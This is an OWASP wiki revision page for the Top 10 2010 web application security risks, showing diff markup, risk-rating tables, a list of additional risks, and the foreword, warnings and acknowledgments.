| class="ce237" style="text-align: left; width: 2.949cm" |
 
<span class="T12">EASY</span>
 
| class="ce238" style="text-align: left; width: 3.159cm" |
 
<span class="T12">UNCOMMON</span>
 
| class="ce239" style="text-align: left; width: 2.949cm" |
 
<span class="T12">AVERAGE</span>
 
| class="ce240" style="text-align: left; width: 2.949cm" |
 
<span class="T12">MODERATE</span>
 
| style="text-align: left" |
 
|- class="ro17"
 
| class="ce241" style="text-align: left; width: 2.751cm" |
 
<span class="T12">A9-Transport</span>
 
| style="text-align: left" |
 
| class="ce242" style="text-align: left; width: 2.949cm" |
 
<span class="T12">DIFFICULT</span>
 
| class="ce243" style="text-align: left; width: 3.159cm" |
 
<span class="T12">COMMON</span>
 
| class="ce244" style="text-align: left; width: 2.949cm" |
 
<span class="T12">EASY</span>
 
| class="ce245" style="text-align: left; width: 2.949cm" |
 
<span class="T12">MODERATE</span>
 
| style="text-align: left" |
 
|- class="ro17"
 
| class="ce246" style="text-align: left; width: 2.751cm" |
 
<span class="T12">A10-Redirects</span>
 
| style="text-align: left" |
 
| class="ce247" style="text-align: left; width: 2.949cm" |
 
<span class="T12">AVERAGE</span>
 
| class="ce248" style="text-align: left; width: 3.159cm" |
 
<span class="T12">UNCOMMON</span>
 
| class="ce249" style="text-align: left; width: 2.949cm" |
 
<span class="T12">EASY</span>
 
| class="ce250" style="text-align: left; width: 2.949cm" |
 
<span class="T12">MODERATE</span>
 
| style="text-align: left" |
 
|}
 
 
[[Image:./]]
 
 
</div>
 
 
<span class="T27">          </span><span class="T27">Security</span><span class="T27"><br /></span><span class="T27">          Weakness</span>
 
 
<span class="T27">    </span><span class="T27">Attack</span>
 
 
<span class="T27">    </span><span class="T27">Vectors</span>
 
 
<span class="T27"> </span><span class="T27">Technical</span><span class="T27"><br /></span><span class="T27">  Impacts</span>
 
 
<div id="Table_14" style="height: 7.022cm; width: 19.049cm">
 
 
{|
 
|- class="ro3"
 
| class="ce251" style="text-align: left; width: 19.05cm" |
 
<span class="T7">Additional Risks to Consider</span>
 
|- class="ro33"
 
| class="ce252" style="text-align: left; width: 19.05cm" |
 
<span class="T8">The Top 10 cover a lot of ground, but there are other risks that you should consider and evaluate in your organization. Some of these have appeared in previous versions of the OWASP Top 10, and others have not, including new attack techniques that are being identified all the time.  Other important application security risks (listed in alphabetical order) that you should also consider include:</span>
 
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T8">[http://www.owasp.org/index.php/Clickjacking Clickjacking]</span><span class="T8"> </span><span class="T8">(Newly discovered attack technique in 2008)</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T8">Concurrency Flaws</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T8">[http://www.owasp.org/index.php/Application_Denial_of_Service Denial of Service]</span><span class="T8"> </span><span class="T8">(Was 2004 Top 10 – Entry A9)</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T8">[http://projects.webappsec.org/Information-Leakage Information Leakage]</span><span class="T8"> </span><span class="T8">and </span><span class="T8">[http://www.owasp.org/index.php/Top_10_2007-A6 Improper Error Handling]</span><span class="T8"> (Was part of 2007 Top 10 – Entry A6)</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T8">[http://projects.webappsec.org/Insufficient+Anti-automation Insufficient Anti-automation]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T8">Insufficient Logging and Accountability (Related to 2007 Top 10 – Entry A6)</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T8">[http://www.owasp.org/index.php/ApplicationLayerIntrustionDetection Lack of Intrusion Detection and Response]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T8">[http://www.owasp.org/index.php/Top_10_2007-A3 Malicious File Execution]</span><span class="T8"> </span><span class="T8">(Was 2007 Top 10 – Entry A3)</span><span class="odfLiEnd"> </span>
 
|}
 
 
[[Image:./]]
 
 
</div>
 
 
<span class="T42">Threat</span><span class="T42"><br /></span><span class="T42">Agents</span>
 
 
<span class="T27">Business</span><span class="T27"><br /></span><span class="T27">Impacts</span>
 
 
<span class="T42">Prevalence</span>
 
 
<span class="T42">Detectability</span>
 
 
<span class="T42">Exploitability</span>
 
 
<span class="T42">Impact</span>
 
 
<div id="Notes_Placeholder_2" class="P5" style="height: 0.001cm; width: 0.001cm"><div>
 
 
</div></div><div id="Slide_Number_Placeholder_3" class="P4" style="height: 0.001cm; width: 0.001cm"><div>
 
  
<span class="T4"><span title="page-number">21</span></span><span class="T4"><span title="page-number">21</span></span>
+
{{Top_10_2010:SubsectionColoredTemplate|Acknowledgments|}}
 +
Thanks to [http://www.aspectsecurity.com Aspect Security] for initiating, leading, and updating the OWASP Top 10 since its inception in 2002, and to its primary authors:<BR>
  
</div></div></div><div id="page22" class="dp3"><div id="Picture_2" class="P8" style="height: 25.399cm; width: 19.131cm">
+
* [[User:Jeff Williams|Jeff Williams]]
 +
* [[User:wichers|Dave Wichers]]
  
[[Image:./]]
+
{{MemberLinks|link=http://www.aspectsecurity.com|logo=Aspect_logo_owasp.jpg}}
  
</div><div id="Notes_Placeholder_2" class="P5" style="height: 0.001cm; width: 0.001cm"><div>
+
We’d like to thank those organizations that contributed their vulnerability prevalence data to support the 2010 update:  
  
</div></div><div id="Slide_Number_Placeholder_3" class="P4" style="height: 0.001cm; width: 0.001cm"><div>
+
* [http://www.aspectsecurity.com Aspect Security]
 +
* [http://www.mitre.org MITRE] – [http://cve.mitre.org CVE]
 +
* [http://www.softtek.com Softtek]
 +
* [http://www.whitehatsec.com WhiteHat Security Inc.] – [http://www.whitehatsec.com/home/resource/stats.html Statistics]
  
<span class="T4"><span title="page-number">21</span></span><span class="T4"><span title="page-number">21</span></span>
+
We’d also like to thank those who have contributed significant content or time reviewing this update of the Top 10:
 +
*Mike Boberski (Booz Allen Hamilton)
 +
*Juan Carlos Calderon ([http://www.softtek.com Softtek])
 +
*Michael Coates (Aspect Security)
 +
*Jeremiah Grossman (WhiteHat Security Inc.)
 +
*Jim Manico (for all the Top 10 podcasts)
 +
*Paul Petefish (Solutionary, Inc.)
 +
*Eric Sheridan ([http://www.aspectsecurity.com Aspect Security])
 +
*Neil Smithline ([http://www.OneStopAppSecurity.com OneStopAppSecurity.com])
 +
*Andrew van der Stock
 +
*Colin Watson (Watson Hall, Ltd.)
 +
*OWASP Denmark Chapter (Led by Ulf Munkedal)
 +
*OWASP Sweden Chapter (Led by John Wilander)
  
</div></div></div>
+
{{Top_10_2010:BottomTemplate|usenext=2010NextLink|next=Release Notes|useprev=Nothing|prev=}}
 +
[[Category:OWASP Top Ten Project]]

Latest revision as of 11:50, 4 February 2018

NOTE: THIS IS NOT THE LATEST VERSION. Please visit the OWASP Top 10 project page to find the latest edition.

 
Top 10 Introduction
Top 10 Risks
 Release Notes →
Foreword

Insecure software is already undermining our financial, healthcare, defense, energy, and other critical infrastructure. As our digital infrastructure gets increasingly complex and interconnected, the difficulty of achieving application security increases exponentially. We can no longer afford to tolerate relatively simple security problems like those presented in the OWASP Top 10.

The goal of the Top 10 project is to raise awareness about application security by identifying some of the most critical risks facing organizations. The Top 10 project is referenced by many standards, books, tools, and organizations, including MITRE, PCI DSS, DISA, FTC, and many more. This release of the OWASP Top 10 marks this project’s eighth year of raising awareness of the importance of application security risks. The OWASP Top 10 was first released in 2003, minor updates were made in 2004 and 2007, and this is the 2010 release.

We encourage you to use the Top 10 to get your organization started with application security. Developers can learn from the mistakes of other organizations. Executives should start thinking about how to manage the risk that software applications create in their enterprise.

But the Top 10 is not an application security program. Going forward, OWASP recommends that organizations establish a strong foundation of training, standards, and tools that makes secure coding possible. On top of that foundation, organizations should integrate security into their development, verification, and maintenance processes. Management can use the data generated by these activities to manage cost and risk associated with application security.

We hope that the OWASP Top 10 is useful to your application security efforts. Please don’t hesitate to contact OWASP with your questions, comments, and ideas, either publicly to [email protected] or privately to [email protected].

Welcome

Welcome to the OWASP Top 10 2010! This significant update presents a more concise, risk focused list of the Top 10 Most Critical Web Application Security Risks. The OWASP Top 10 has always been about risk, but this update makes this much more clear than previous editions. It also provides additional information on how to assess these risks for your applications.

For each item in the top 10, this release discusses the general likelihood and consequence factors that are used to categorize the typical severity of the risk. It then presents guidance on how to verify whether you have problems in this area, how to avoid them, some example flaws, and pointers to links with more information.

The primary aim of the OWASP Top 10 is to educate developers, designers, architects, managers, and organizations about the consequences of the most important web application security weaknesses. The Top 10 provides basic techniques to protect against these high risk problem areas – and also provides guidance on where to go from here.

Warnings

Don’t stop at 10. There are hundreds of issues that could affect the overall security of a web application as discussed in the OWASP Developer's Guide. This is essential reading for anyone developing web applications today. Guidance on how to effectively find vulnerabilities in web applications are provided in the OWASP Testing Guide and the OWASP Code Review Guide, which have both been significantly updated since the previous release of the OWASP Top 10.

Constant change. This Top 10 will continue to change. Even without changing a single line of your application’s code, you may already be vulnerable to something nobody ever thought of before. Please review the advice at the end of the Top 10 in “What’s Next For Developers, Verifiers, and Organizations” for more information.

Think positive. When you’re ready to stop chasing vulnerabilities and focus on establishing strong application security controls, OWASP has just produced the Application Security Verification Standard (ASVS) as a guide to organizations and application reviewers on what to verify. Use tools wisely. Security vulnerabilities can be quite complex and buried in mountains of code. In virtually all cases, the most cost-effective approach for finding and eliminating these weaknesses is human experts armed with good tools.

Push left. Secure web applications are only possible when a secure software development life-cycle is used. For guidance on how to implement a secure SDLC, we recently released the Open Software Assurance Maturity Model (SAMM), which is a major update to the OWASP CLASP Project.

The Pages of the Top 10


Acknowledgments

Thanks to Aspect Security for initiating, leading, and updating the OWASP Top 10 since its inception in 2002, and to its primary authors:

Aspect_logo_owasp.jpg       

We’d like to thank those organizations that contributed their vulnerability prevalence data to support the 2010 update:

We’d also like to thank those who have contributed significant content or time reviewing this update of the Top 10:

  • Mike Boberski (Booz Allen Hamilton)
  • Juan Carlos Calderon (Softtek)
  • Michael Coates (Aspect Security)
  • Jeremiah Grossman (WhiteHat Security Inc.)
  • Jim Manico (for all the Top 10 podcasts)
  • Paul Petefish (Solutionary, Inc.)
  • Eric Sheridan (Aspect Security)
  • Neil Smithline (OneStopAppSecurity.com)
  • Andrew van der Stock
  • Colin Watson (Watson Hall, Ltd.)
  • OWASP Denmark Chapter (Led by Ulf Munkedal)
  • OWASP Sweden Chapter (Led by John Wilander)


 
Top 10 Introduction
Top 10 Risks
 Release Notes →
© 2002-2010 OWASP Foundation This document is licensed under the Creative Commons Attribution-ShareAlike 3.0 license. Some rights reserved. CC-by-sa-3 0-88x31.png
Retrieved from "https://wiki.owasp.org/index.php?title=Top_10_2010&oldid=237278"